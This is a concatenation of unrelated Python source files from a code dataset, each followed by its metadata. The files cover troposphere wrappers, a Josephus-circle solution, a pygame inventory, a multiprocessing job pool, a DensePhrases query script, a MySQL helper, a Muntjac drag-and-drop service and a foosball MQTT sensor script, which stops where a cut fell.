validation=validation, \n          Name=Name, \n          Description=Description, **kwargs)\n        (super(PublicDnsNamespace, self).__init__)(**processed_kwargs)\n\n\nclass HealthCheckConfig(troposphere.servicediscovery.HealthCheckConfig, Mixin):\n\n    def __init__(self, title=None, Type=REQUIRED, FailureThreshold=NOTHING, ResourcePath=NOTHING, **kwargs):\n        processed_kwargs = preprocess_init_kwargs(title=title, \n          Type=Type, \n          FailureThreshold=FailureThreshold, \n          ResourcePath=ResourcePath, **kwargs)\n        (super(HealthCheckConfig, self).__init__)(**processed_kwargs)\n\n\nclass HealthCheckCustomConfig(troposphere.servicediscovery.HealthCheckCustomConfig, Mixin):\n\n    def __init__(self, title=None, FailureThreshold=REQUIRED, **kwargs):\n        processed_kwargs = preprocess_init_kwargs(title=title, \n          FailureThreshold=FailureThreshold, **kwargs)\n        (super(HealthCheckCustomConfig, self).__init__)(**processed_kwargs)\n\n\nclass DnsRecord(troposphere.servicediscovery.DnsRecord, Mixin):\n\n    def __init__(self, title=None, TTL=REQUIRED, Type=REQUIRED, **kwargs):\n        processed_kwargs = preprocess_init_kwargs(title=title, \n          TTL=TTL, \n          Type=Type, **kwargs)\n        (super(DnsRecord, self).__init__)(**processed_kwargs)\n\n\nclass DnsConfig(troposphere.servicediscovery.DnsConfig, Mixin):\n\n    def __init__(self, title=None, DnsRecords=REQUIRED, NamespaceId=REQUIRED, RoutingPolicy=NOTHING, **kwargs):\n        processed_kwargs = preprocess_init_kwargs(title=title, \n          DnsRecords=DnsRecords, \n          NamespaceId=NamespaceId, \n          RoutingPolicy=RoutingPolicy, **kwargs)\n        (super(DnsConfig, self).__init__)(**processed_kwargs)\n\n\nclass Service(troposphere.servicediscovery.Service, Mixin):\n\n    def __init__(self, title, template=None, validation=True, Description=NOTHING, DnsConfig=NOTHING, HealthCheckConfig=NOTHING, HealthCheckCustomConfig=NOTHING, Name=NOTHING, NamespaceId=NOTHING, **kwargs):\n        processed_kwargs = preprocess_init_kwargs(title=title, \n          template=template, \n          validation=validation, \n          Description=Description, \n          DnsConfig=DnsConfig, \n          HealthCheckConfig=HealthCheckConfig, \n          HealthCheckCustomConfig=HealthCheckCustomConfig, \n          Name=Name, \n          NamespaceId=NamespaceId, **kwargs)\n        (super(Service, self).__init__)(**processed_kwargs)\n\n\nclass HttpNamespace(troposphere.servicediscovery.HttpNamespace, Mixin):\n\n    def __init__(self, title, template=None, validation=True, Name=REQUIRED, Description=NOTHING, **kwargs):\n        processed_kwargs = preprocess_init_kwargs(title=title, \n          template=template, \n          validation=validation, \n          Name=Name, \n          Description=Description, **kwargs)\n        (super(HttpNamespace, self).__init__)(**processed_kwargs)","sub_path":"pycfiles/troposphere_mate-0.0.14-py2.py3-none-any/servicediscovery.cpython-36.py","file_name":"servicediscovery.cpython-36.py","file_ext":"py","file_size_in_byte":5073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"486977783","text":"\"\"\"\nProblem description\nEvery year on June 1st, Children's Day, Nowcoder prepares some small gifts and visits the children\nin the orphanage, and this year is no exception. HF, as a senior member of Nowcoder, naturally\nprepared some games. One of them goes like this: first, the children stand in a big circle. Then HF\npicks a random number m and has the child numbered 0 start counting. Each time, the child who calls\nout m-1 steps out of the circle, sings a song, may pick any gift from the gift box, and does not\nreturn to the circle; counting 0...m-1 then restarts from the next child... and so on... until only\none child is left. That child does not have to perform and receives Nowcoder's prized \"Detective\nConan\" collector's edition (limited availability!! ^_^). Try to work out which child will get this\ngift. (Note: the children are numbered from 0 to n-1.)\n\"\"\"\n\n\n# -*- coding:utf-8 -*-\nclass LNode:\n    def __init__(self, item=None):\n        self.val = item\n        self.next = None\n\n\nclass Solution:\n    def LastRemaining_Solution(self, n, m):\n        # write code here\n        if n == 0 or m == 0:\n            return -1\n        head = LNode()\n        cur = head\n        for i in range(n):\n            cur.next = LNode(i)\n            cur = cur.next\n        
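        # The next statement closes the ring: the tail points back to the first\n        # real node, making the list circular. A constant-space alternative is the\n        # Josephus recurrence f(1) = 0, f(k) = (f(k-1) + m) % k for k = 2..n.\n        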
cur.next = head.next\n\n cur = head.next\n while cur != cur.next:\n for i in range(m - 1):\n pre = cur\n cur = cur.next\n if cur != head.next:\n pre.next = cur.next\n cur = cur.next\n else:\n head.next = cur.next\n pre.next = cur.next\n cur = cur.next\n return cur.val","sub_path":"剑指office/孩子们的游戏(圆圈中最后剩下的数).py","file_name":"孩子们的游戏(圆圈中最后剩下的数).py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"423669291","text":"from ItemIds import ids\r\nimport pygame\r\n\r\npygame.init()\r\n\r\n\r\nclass Inventory:\r\n def __init__(self):\r\n self.tiles = [Tile(10, 20), Tile(75, 20), Tile(150, 20), Tile(215, 20), Tile(280, 20), Tile(345, 20)]\r\n self.open = False\r\n self.font = pygame.font.SysFont(\"calibri\", 20)\r\n self.pickeditem = None\r\n self.pickedamount = None\r\n self.pressed = False\r\n self.selectednum = 0\r\n self.selectedslot = None\r\n self.selecteditem = None\r\n\r\n def draw(self, screen):\r\n if self.open:\r\n screen.fill((0, 0, 0))\r\n for slot in self.tiles:\r\n slot.draw(screen)\r\n screen.blit(self.font.render(\"hands\", False, (255, 255, 255)), (55, 2))\r\n screen.blit(self.font.render(\"pockets\", False, (255, 255, 255)), (250, 2))\r\n if self.pickeditem is not None:\r\n screen.blit(ids[self.pickeditem],\r\n (pygame.mouse.get_pos()[0] - 32, pygame.mouse.get_pos()[1] - 32))\r\n else:\r\n # width of 420 height of 85\r\n pygame.draw.rect(screen, (0, 0, 0), (190, 415, 420, 85))\r\n for slot in self.tiles:\r\n slot.hotbar_draw(screen, (201 + self.tiles.index(slot) * 65, 426))\r\n if (slot.xpos, slot.ypos) == self.selectedslot:\r\n pygame.draw.rect(screen, (0, 0, 0), (203 + self.tiles.index(slot) * 65, 428, 59, 59), 1)\r\n\r\n def update(self, screen, events):\r\n self.selectedslot = self.tiles[self.selectednum].xpos, self.tiles[self.selectednum].ypos\r\n for slot in self.tiles:\r\n if (slot.xpos, slot.ypos) == self.selectedslot:\r\n self.selecteditem = slot.item\r\n mouse = pygame.mouse.get_pressed()\r\n self.draw(screen)\r\n if self.open:\r\n mouse_slot = self.mouse_on_slot()\r\n if mouse[0]:\r\n if not self.pressed:\r\n self.pressed = True\r\n if self.pickeditem is not None:\r\n self.placeitem(mouse_slot)\r\n else:\r\n self.pickitem(mouse_slot)\r\n if not mouse[0]:\r\n if self.pressed:\r\n self.pressed = False\r\n for event in events:\r\n if event.type == pygame.KEYDOWN:\r\n if event.key in [pygame.K_1, pygame.K_2, pygame.K_3, pygame.K_4, pygame.K_5, pygame.K_6]:\r\n self.selectednum = int(event.unicode) - 1\r\n elif event.key == pygame.K_e:\r\n self.open = not self.open\r\n\r\n def mouse_on_slot(self):\r\n mouse = pygame.mouse.get_pos()\r\n for slot in self.tiles:\r\n if slot.rect.collidepoint(mouse[0], mouse[1]):\r\n return slot.xpos, slot.ypos\r\n\r\n def pickitem(self, slot):\r\n for tile in self.tiles:\r\n if (tile.xpos, tile.ypos) == slot:\r\n self.pickeditem, self.pickedamount = tile.item, tile.amount\r\n tile.item, tile.amount = None, None\r\n\r\n def placeitem(self, slot):\r\n for tile in self.tiles:\r\n if (tile.xpos, tile.ypos) == slot:\r\n if tile.item == self.pickeditem:\r\n self.pickedamount -= 1\r\n tile.amount += 1\r\n if self.pickedamount == 0:\r\n self.pickeditem = None\r\n elif tile.item is None:\r\n tile.item, tile.amount = self.pickeditem, self.pickedamount\r\n self.pickeditem, self.pickedamount = None, None\r\n elif tile.item != self.pickeditem:\r\n item, amount = tile.item, tile.amount\r\n tile.item, tile.amount = self.pickeditem, self.pickedamount\r\n 
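                    # three-way swap: the slot's stack was stashed in (item, amount)\r\n                    # above, the held stack goes into the slot, and the stashed\r\n                    # stack becomes the held one below\r\n                    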
self.pickeditem, self.pickedamount = item, amount\r\n\r\n    def additem(self, item, amount):\r\n        # stack onto an existing slot holding the same item, if any\r\n        for slot in self.tiles:\r\n            if slot.item == item:\r\n                slot.amount += amount\r\n                return\r\n        # otherwise use the first empty slot; the original sentinel approach\r\n        # (item, amount = None, None) could later match empty slots and crash\r\n        # on None += None, so we return as soon as the stack is placed\r\n        for slot in self.tiles:\r\n            if slot.item is None:\r\n                slot.item, slot.amount = item, amount\r\n                return\r\n\r\n    def space_for(self, item):\r\n        for slot in self.tiles:\r\n            if slot.item == item:\r\n                return True\r\n            if slot.item is None:\r\n                return True\r\n        return False\r\n\r\n    def read_slot(self, slotnum):\r\n        return self.tiles[slotnum].item, self.tiles[slotnum].amount\r\n\r\n\r\nclass Tile(pygame.sprite.Sprite):\r\n    def __init__(self, xpos, ypos, item=None, amount=None):\r\n        super().__init__()\r\n        self.xpos = xpos\r\n        self.ypos = ypos\r\n        self.image = pygame.Surface((63, 63))\r\n        self.image.fill((255, 255, 255))\r\n        self.item = item\r\n        self.amount = amount\r\n        self.ids = ids\r\n        self.font = pygame.font.SysFont(\"calibri\", 10)\r\n        self.rect = pygame.Rect(xpos, ypos, 65, 65)\r\n\r\n    def add_item(self, item, amount):\r\n        self.item = item\r\n        self.amount = amount\r\n\r\n    def draw(self, screen):\r\n        screen.blit(self.image, (self.xpos + 1, self.ypos + 1))\r\n        if self.item is not None:\r\n            screen.blit((self.ids[self.item]), ((self.xpos + 3), (self.ypos + 3)))\r\n            screen.blit(self.font.render(str(self.amount), False, (0, 0, 0)), (self.xpos + 5, self.ypos + 50))\r\n\r\n    def hotbar_draw(self, screen, pos):\r\n        xpos, ypos = pos\r\n        screen.blit(self.image, pos)\r\n        if self.item is not None:\r\n            screen.blit((self.ids[self.item]), ((xpos + 3), (ypos + 3)))\r\n            screen.blit(self.font.render(str(self.amount), False, (0, 0, 0)), (xpos + 5, ypos + 50))\r\n","sub_path":"We do no come in peace with classes/Inventory.py","file_name":"Inventory.py","file_ext":"py","file_size_in_byte":5725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"554321826","text":"\"\"\"\nInstead of MPI parallelisation for each pixel, it is [citation needed] faster\nto simply distribute pixels to different processes via pooling. The speedup is\nnot about the actual sampling, but the overheads are only executed once...\n\"\"\"\n\nfrom __future__ import division\nimport sys\nimport time\nimport multiprocessing\nimport subprocess\nfrom collections import OrderedDict\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy import log\n\n\ndef get_log_file_fmatter(log_file=None, prefix='g35-nh3_',\n                         proj_dir = '~/Projects/g35-vla-nh3/'):\n    \"\"\" Backwards compatibility with g35-vla-nh3 repo. 
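Returns a str.format template whose '{}' slots are filled with (x, y, npeaks)\n    by get_logger below; one log file per pixel.\n    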
\"\"\"\n if log_file is None:\n from os.path import expanduser\n log_dir = expanduser(proj_dir + 'nested-sampling/logs/')\n log_file_fmatter = log_dir + 'g35-nh3_x{}y{}-npeaks{}.log'\n\n return log_file_fmatter\n\n\ndef get_logger(x, y, npeaks, log_file_fmatter=None):\n \"\"\" One log file per pixel to avoid race condition \"\"\"\n if log_file_fmatter is None:\n log_file_fmatter = get_log_file_fmatter()\n log_file = log_file_fmatter.format(x, y, npeaks)\n\n return open(log_file, \"w\")\n\n\ndef work(cmd):\n \"\"\" Hacks around arg-feeding the shell while neatly redirecting stdout \"\"\"\n try:\n _, _, npeaks, y, x, _, perc = cmd.split(' ')\n except ValueError:\n # there's an `echo` command in front of cmd,\n # so we're runnning in `testing=True` mode\n _, _, _, npeaks, y, x, _, perc = cmd.split(' ')\n stdout = get_logger(x, y, npeaks)\n # testing:\n time_string = time.strftime(\"%Y-%m-%d %H:%M\")\n log.info(\"{}: processing (x, y) = ({:2d}, {:2d});\"\n \" {} done\".format(time_string, int(x), int(y), perc))\n\n # hack to get the total number of jobs\n cmd = ' '.join(cmd.split(' ')[:-1])\n\n # execute the worker\n return subprocess.call(cmd.split(' '),\n stdout = stdout,\n shell = False)\n\n\ndef get_xy_sorted(arr, xy_indices=None, cut = None):\n \"\"\"\n Sort xy indices by a value array.\n Adapted from pyspeckit's SpectralCube.py.\n \"\"\"\n if xy_indices is None:\n xy_indices = np.indices(arr.shape)\n yy, xx = xy_indices\n arrsort = np.argsort((1 / (arr - np.nanmin(arr) + .1)).flat)\n\n mask = np.isfinite(arr).flat\n if cut:\n mask = mask & (np.nan_to_num(arr.flat) > cut)\n\n sorted_arr = list(zip(xx.flat[arrsort][mask[arrsort]],\n yy.flat[arrsort][mask[arrsort]]))\n return sorted_arr\n\n\ndef snr_order(line='nh311', snr11=None, snr22=None, **kwargs):\n \"\"\"\n Was written for an ammonia cube data, have yet to generalize.\n \"\"\"\n if snr11 is None or snr22 is None:\n snr11, snr22 = get_vla_snr()\n line_to_snr = {'nh311': snr11, 'nh322': snr22}\n\n return get_xy_sorted(line_to_snr[line], np.indices(snr11.shape), **kwargs)\n\n\ndef bayes_factor_order(kfile='Ks.fits', idx=0, **kwargs):\n K = fits.getdata(kfile)[idx]\n\n return get_xy_sorted(K, np.indices(K.shape), **kwargs)\n\n\ndef get_vla_snr():\n \"\"\"\n Backwards compatibility with the g35-vla-nh3 repo.\n \"\"\"\n from opencube import make_cube_shh\n cubes = make_cube_shh() # comes with pregen snr attributes...\n snrmap11, snrmap22 = cubes.snr11, cubes.snr22\n\n return snrmap11, snrmap22\n\n\ndef xy_sorted_by(method='Bfactor', **kwargs):\n \"\"\"\n Returns xy indices sorted according to a given method.\n Additional keyword arguments are passed to the method f-ions.\n \"\"\"\n method_to_func = {'Bfactor': bayes_factor_order,\n 'snr' : snr_order }\n\n return method_to_func[method](**kwargs)\n\ndef perc(i, n_jobs, n_cpu, split=False):\n if split:\n jobs_per_cpu = n_jobs / n_cpu\n p = (i % jobs_per_cpu) / jobs_per_cpu * 100\n else:\n p = i / n_jobs * 100\n return \"%{:.2f}\".format(p)\n\ndef get_tasks(n_cpu, npeaks=1, method='Bfactor', testing=False,\n script=\"innocent_script.py\", xy_order=None, **kwargs):\n if xy_order is None:\n xy_order = xy_sorted_by(method, **kwargs)\n\n prefix = 'echo ' if testing else ''\n\n cmd_string = (\"{}python{} {} {} \".format(prefix, sys.version_info.major,\n script, npeaks) + \"{} {} 0 {}\")\n n_jobs = len(xy_order)\n tasks = [cmd_string.format(y, x, perc(i, n_jobs, n_cpu))\n for i, (x, y) in enumerate(xy_order)]\n\n return tasks\n\ndef try_get_args(n, fallback, forcetype=str):\n try:\n # sys.argv[0] is 
some env executable path...\n arg = forcetype(sys.argv[n+1])\n except IndexError:\n arg = fallback\n\n return arg\n\n\nif __name__ == '__main__':\n \"\"\" Example run, custom-tailored to the VLA data on G035.39. \"\"\"\n # NOTE: normal dict would mess up the order of the arguments\n default_args = OrderedDict([('npeaks', 1), ('method', \"snr\"), ('cut', 8),\n ('n_cpu', 7)])\n\n runtime_args = {}\n for i, (argname, argval) in enumerate(default_args.items()):\n runtime_args[argname] = try_get_args(i, argval, type(argval))\n\n method = runtime_args.pop('method')\n n_cpu = runtime_args.pop('n_cpu')\n if method == 'snr':\n line = 'nh322'\n snrmap11, snrmap22 = get_vla_snr()\n\n tasklist_kwargs=dict(n_cpu=n_cpu, method='snr', line=line,\n snr11=snrmap11, snr22=snrmap22)\n\n if method == 'Bfactor':\n # TODO FIXME:\n raise NotImplementedError\n\n tasklist_kwargs.update(runtime_args)\n\n tasks = get_tasks(**tasklist_kwargs)\n\n pool = multiprocessing.Pool(processes=n_cpu)\n pool.map(work, tasks)\n\n\ndef testing_K_sort(Kfile='Ks.fits', index=0, debug=False):\n if debug:\n log.setLevel('DEBUG')\n\n K_vals = fits.getdata(Kfile)[index]\n K_new = np.inf\n\n tasks = get_tasks(method='Bfactor', npeaks=1, cut=20)\n for job in tasks:\n _, _, npeaks, y, x, _, p = job.split(' ')\n x, y = int(x), int(y)\n K_new, K_old = K_vals[y, x], K_new\n\n assert K_old > K_new\n\n log.debug(\"K = {:7.2f} at (x, y) = ({:2d}, \"\n \"{:2d}), {} done\".format(K_new, x, y, p))\n\n\ndef testing_snr_sort(snrmap11=None, snrmap22=None, debug=False,\n cut=5, line='nh311', n_cpu=7, run=False):\n \"\"\"\n Assures that the S/N ordering is being executed properly.\n Was written for an ammonia cube data, have yet to generalize.\n \"\"\"\n if debug:\n log.setLevel('DEBUG')\n\n if snrmap11 is None and snrmap22 is None:\n snrmap11, snrmap22 = get_vla_snr()\n\n snr, snr_prev = {}, {'nh311': np.inf, 'nh322': np.inf}\n tasks_by_snr = get_tasks(n_cpu=n_cpu, method='snr', cut=cut, line=line,\n snr11=snrmap11, snr22=snrmap22, testing=True)\n for job in tasks_by_snr:\n _, _, _, npeaks, y, x, _, p = job.split(' ')\n x, y = int(x), int(y)\n snr['nh311'], snr['nh322'] = snrmap11[y, x], snrmap22[y, x]\n\n # make sure the snr job list progresses downwards\n assert snr[line] <= snr_prev[line]\n\n log.debug(\"S/R @ NH3 (1,1) = {:.2f}, \"\n \"S/R @ NH3 (2,2) = {:.2f} at (x, y) = \"\n \"({:2d}, {:2d}), {} done\".format(snr['nh311'], snr['nh322'],\n x, y, p))\n\n # used later for recurrent relation reasons...\n snr_prev['nh311'], snr_prev['nh322'] = snr['nh311'], snr['nh322']\n\n if run:\n pool = multiprocessing.Pool(processes=n_cpu)\n pool.map(work, tasks_by_snr)\n","sub_path":"pyspecnest/pool_multinest.py","file_name":"pool_multinest.py","file_ext":"py","file_size_in_byte":7491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"58129870","text":"import json\nimport argparse\nimport torch\nimport os\nimport random\nimport numpy as np\nimport requests\nimport logging\nimport math\nimport copy\nimport string\nimport faiss\n\nfrom time import time\nfrom tqdm import tqdm\n\nfrom densephrases.utils.open_utils import load_query_encoder, load_phrase_index, get_query2vec, load_qa_pairs\n\nlogging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S',\n level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\ndef embed_query(question, args, query_encoder, tokenizer, batch_size=1):\n query2vec = get_query2vec(\n query_encoder=query_encoder, tokenizer=tokenizer, 
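        # get_query2vec presumably returns a callable mapping question strings to\n        # (start, end) vector pairs, which are concatenated below into a single\n        # [start; end] phrase-query vector per question.\n        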
args=args, batch_size=batch_size\n )\n all_outs = []\n for q_idx in tqdm(range(0, len(question), batch_size)):\n print(question[q_idx:q_idx+batch_size])\n outs = query2vec(question[q_idx:q_idx+batch_size])\n all_outs += outs\n start = np.concatenate([out[0] for out in all_outs], 0)\n end = np.concatenate([out[1] for out in all_outs], 0)\n query_vec = np.concatenate([start, end], 1)\n #logger.info(f'Query reps: {query_vec.shape}')\n return query_vec\n\ndef evaluate(question, args, mips=None, query_encoder=None, tokenizer=None):\n # Load dataset and encode queries\n if query_encoder is None:\n print(f'Query encoder will be loaded from {args.query_encoder_path}')\n device = 'cuda' if args.cuda else 'cpu'\n query_encoder, tokenizer = load_query_encoder(device, args)\n query_vec = embed_query(question, args, query_encoder, tokenizer)\n\n # Load MIPS\n if mips is None:\n mips = load_phrase_index(args)\n\n # Search\n step = 1\n #logger.info(f'Aggergation strategy used: {args.agg_strat}')\n predictions = []\n evidences = []\n titles = []\n scores = []\n se_poss = []\n for q_idx in tqdm(range(0, len(question), step)):\n result = mips.search(\n query_vec[q_idx:q_idx+step],\n q_texts=question[q_idx:q_idx+step], nprobe=args.nprobe,\n top_k=args.top_k, max_answer_length=args.max_answer_length,\n aggregate=args.aggregate, agg_strat=args.agg_strat,\n )\n prediction = [[ret['answer'] for ret in out] if len(out) > 0 else [''] for out in result]\n evidence = [[ret['context'] for ret in out] if len(out) > 0 else [''] for out in result]\n title = [[ret['title'] for ret in out] if len(out) > 0 else [['']] for out in result]\n score = [[ret['score'] for ret in out] if len(out) > 0 else [-1e10] for out in result]\n se_pos = [[(ret['start_pos'], ret['end_pos']) for ret in out] if len(out) > 0 else [(0,0)] for out in result]\n predictions += prediction\n evidences += evidence\n titles += title\n scores += score\n se_poss += se_pos\n\n pred_out = {\n 'question': question[0],\n 'prediction': predictions[0], 'score': scores[0], 'title': titles[0],\n 'evidence': evidences[0] if evidences is not None else '',\n }\n with open(args.question_test_out, 'w') as f:\n json.dump(pred_out, f)\n \n return prediction\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n # QueryEncoder\n parser.add_argument('--model_type', default='bert', type=str)\n parser.add_argument(\"--pretrained_name_or_path\", default='SpanBERT/spanbert-base-cased', type=str)\n parser.add_argument(\"--config_name\", default=\"\", type=str)\n parser.add_argument(\"--tokenizer_name\", default=\"\", type=str)\n parser.add_argument(\"--do_lower_case\", default=False, action='store_true')\n parser.add_argument('--max_query_length', default=64, type=int)\n parser.add_argument(\"--cache_dir\", default=None, type=str)\n parser.add_argument(\"--query_encoder_path\", default='', type=str)\n parser.add_argument(\"--query_port\", default='-1', type=str)\n\n # PhraseIndex\n parser.add_argument('--dump_dir', default='dump')\n parser.add_argument('--phrase_dir', default='phrase')\n parser.add_argument('--index_dir', default='256_flat_SQ4')\n parser.add_argument('--index_name', default='index.faiss')\n parser.add_argument('--idx2id_name', default='idx2id.hdf5')\n parser.add_argument('--index_port', default='-1', type=str)\n\n # These can be dynamically changed.\n parser.add_argument('--max_answer_length', default=10, type=int)\n parser.add_argument('--top_k', default=10, type=int)\n parser.add_argument('--nprobe', default=256, type=int)\n 
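    # nprobe sets how many inverted-list cells a Faiss IVF index scans per query;\n    # larger values improve recall at the cost of search latency.\n    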
parser.add_argument('--aggregate', default=False, action='store_true')\n    parser.add_argument('--agg_strat', default='opt1', type=str)\n    parser.add_argument('--truecase', default=False, action='store_true')\n    parser.add_argument(\"--truecase_path\", default='truecase/english_with_questions.dist', type=str)\n\n    # Run mode\n    parser.add_argument('--run_mode', default='eval')\n    parser.add_argument('--cuda', default=False, action='store_true')\n    parser.add_argument('--draft', default=False, action='store_true')\n    parser.add_argument('--debug', default=False, action='store_true')\n    parser.add_argument('--save_pred', default=False, action='store_true')\n    parser.add_argument('--seed', default=1992, type=int)\n\n    # query encoder for step1\n    parser.add_argument('--question_test_out', default='sample/step1_question_test_out.json')\n\n    args = parser.parse_args()\n\n    question = input(\"Enter a question to ask (relevant to the sample articles): \\n\")\n    predictions = evaluate([question], args)\n    print()\n    print(\"############### Answer: ################\")\n    print(predictions[0][0])","sub_path":"step1_test_with_question.py","file_name":"step1_test_with_question.py","file_ext":"py","file_size_in_byte":5613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"3818659","text":"'''\n@author:KongWeiKun\n@file: data.py\n@time: 18-4-20 1:50 PM\n@contact: kongwiki@163.com\n'''\nimport pymysql\n\ndef cursors():\n    host='localhost'\n    user='...'\n    pwd='...'\n    db='...'\n    con=pymysql.connect(host,user,pwd,db,use_unicode=True, charset=\"utf8\")  # prevent encoding problems\n    # con.set_charset('utf8')\n    cursor=con.cursor()\n    con.autocommit(True)  # enable autocommit\n    # prevent garbled Chinese characters\n    cursor.execute('SET NAMES utf8;')\n    cursor.execute('SET CHARACTER SET utf8;')\n    cursor.execute('SET character_set_connection=utf8;')\n    return cursor","sub_path":"sql/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"633057741","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/muntjac/terminal/gwt/server/drag_and_drop_service.py\n# Compiled at: 2013-04-04 15:36:36\nimport logging\nfrom muntjac.event.dd.target_details_impl import TargetDetailsImpl\nfrom muntjac.terminal.variable_owner import IVariableOwner\nfrom muntjac.terminal.gwt.server.json_paint_target import JsonPaintTarget\nfrom muntjac.event.dd.drag_and_drop_event import DragAndDropEvent\nfrom muntjac.event.transferable_impl import TransferableImpl\nfrom muntjac.event.dd.drop_target import IDropTarget\nfrom muntjac.event.dd.drag_source import IDragSource\nfrom muntjac.terminal.gwt.client.ui.dd.v_drag_and_drop_manager import DragEventType\nlogger = logging.getLogger(__name__)\n\nclass DragAndDropService(IVariableOwner):\n\n    def __init__(self, manager):\n        self._manager = manager\n        self._lastVisitId = None\n        self._lastVisitAccepted = False\n        self._dragEvent = None\n        self._acceptCriterion = None\n        return\n\n    def changeVariables(self, source, variables):\n        owner = variables.get('dhowner')\n        if not isinstance(owner, IDropTarget):\n            # lazy %s formatting: '+' concatenation raised TypeError for non-str owners\n            logger.critical('DropHandler owner %s must implement IDropTarget', owner)\n            return\n        dropTarget = owner\n        self._lastVisitId = variables.get('visitId')\n        dropRequest = self.isDropRequest(variables)\n        if dropRequest:\n            self.handleDropRequest(dropTarget, variables)\n        else:\n            
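            # a non-drop request is a drag enter/move: only the accept criterion\n            # is evaluated, no drop handler fires\n            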
self.handleDragRequest(dropTarget, variables)\n\n    def handleDropRequest(self, dropTarget, variables):\n        \"\"\"Handles a drop request from the VDragAndDropManager.\n        \"\"\"\n        dropHandler = dropTarget.getDropHandler()\n        if dropHandler is None:\n            logger.info('IDropTarget.getDropHandler() returned null for owner: %s', dropTarget)\n            return\n        else:\n            transferable = self.constructTransferable(dropTarget, variables)\n            dropData = self.constructDragDropDetails(dropTarget, variables)\n            dropEvent = DragAndDropEvent(transferable, dropData)\n            if dropHandler.getAcceptCriterion().accept(dropEvent):\n                dropHandler.drop(dropEvent)\n            return\n\n    def handleDragRequest(self, dropTarget, variables):\n        \"\"\"Handles a drag/move request from the VDragAndDropManager.\n        \"\"\"\n        self._lastVisitId = variables.get('visitId')\n        self._acceptCriterion = dropTarget.getDropHandler().getAcceptCriterion()\n        transferable = self.constructTransferable(dropTarget, variables)\n        dragDropDetails = self.constructDragDropDetails(dropTarget, variables)\n        self._dragEvent = DragAndDropEvent(transferable, dragDropDetails)\n        self._lastVisitAccepted = self._acceptCriterion.accept(self._dragEvent)\n\n    def constructDragDropDetails(self, dropTarget, variables):\n        \"\"\"Construct DragDropDetails based on variables from client drop\n        target. Uses DragDropDetailsTranslator if available, otherwise a\n        default DragDropDetails implementation is used.\n        \"\"\"\n        rawDragDropDetails = variables.get('evt')\n        dropData = dropTarget.translateDropTargetDetails(rawDragDropDetails)\n        if dropData is None:\n            dropData = TargetDetailsImpl(rawDragDropDetails, dropTarget)\n        return dropData\n\n    def isDropRequest(self, variables):\n        return self.getRequestType(variables) == DragEventType.DROP\n\n    def getRequestType(self, variables):\n        typ = int(variables.get('type'))\n        return DragEventType.values()[typ]\n\n    def constructTransferable(self, dropHandlerOwner, variables):\n        sourceComponent = variables.get('component')\n        variables = variables.get('tra')\n        transferable = None\n        if sourceComponent is not None and isinstance(sourceComponent, IDragSource):\n            transferable = sourceComponent.getTransferable(variables)\n        if transferable is None:\n            transferable = TransferableImpl(sourceComponent, variables)\n        return transferable\n\n    def isEnabled(self):\n        return True\n\n    def isImmediate(self):\n        return True\n\n    def printJSONResponse(self, outWriter):\n        if self._isDirty():\n            outWriter.write(', \"dd\":')\n            jsonPaintTarget = JsonPaintTarget(self._manager, outWriter, False)\n            jsonPaintTarget.startTag('dd')\n            jsonPaintTarget.addAttribute('visitId', self._lastVisitId)\n            if self._acceptCriterion is not None:\n                jsonPaintTarget.addAttribute('accepted', self._lastVisitAccepted)\n                self._acceptCriterion.paintResponse(jsonPaintTarget)\n            jsonPaintTarget.endTag('dd')\n            jsonPaintTarget.close()\n            self._lastVisitId = -1\n            self._lastVisitAccepted = False\n            self._acceptCriterion = None\n            self._dragEvent = None\n        return\n\n    def _isDirty(self):\n        if self._lastVisitId > 0:\n            return True\n        return False","sub_path":"pycfiles/Muntjac-1.1.2-py2.7/drag_and_drop_service.py","file_name":"drag_and_drop_service.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"498078819","text":"import RPi.GPIO as GPIO\nimport json\nimport paho.mqtt.client as mqtt\nimport time\nimport asyncio\n\nthread = None\n\nscore_topic = \"foosball/score\"\nspeed_topic = \"foosball/speed\"\n\n# 192.168.195.7 was IR 829 Broker\nbroker_ip = 
\"10.8.182.131\" # <--- Please change IP to match the location of your MQTT broker\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\nir = 15\nir2 = 18\n\nmqttc = mqtt.Client()\nmqttc.connect(broker_ip)\nmqttc.loop_start()\n\nGPIO.setup(ir, GPIO.IN, GPIO.PUD_UP)\nGPIO.setup(ir2, GPIO.IN, GPIO.PUD_DOWN)\n\nstart = 0\nstop = 0\n\n\nasync def data_collect_ir():\n GPIO.add_event_detect(ir, GPIO.BOTH, callback=process_edge, bouncetime=5)\n\n\ndef process_edge(channel):\n if GPIO.input(channel): # test if pin is high\n post_speed(channel)\n else:\n post_score(channel)\n\n\ndef post_score(channel):\n global start\n start = time.time()\n print(\"Start time is:\")\n print(start)\n brokerMessage = {'Status': 'scored', 'Player': '2', 'Score': 1, 'Data': '0'}\n print(\"message sent\")\n mqttc.publish(score_topic, json.dumps(brokerMessage))\n\n\ndef post_speed(channel):\n global stop\n stop = time.time()\n print(\"Stop time is:\")\n print(stop)\n if stop > start:\n elapsed = stop - start\n print(\"Elapsed time is:\")\n print(elapsed)\n speed = .0345 / elapsed # meters per second\n mph = 2.23694 * speed # convert meters/s to mph\n print(\"posting speed\")\n print(mph)\n brokerMessage = {'Status': 'speed', 'Speed': mph}\n mqttc.publish(speed_topic, 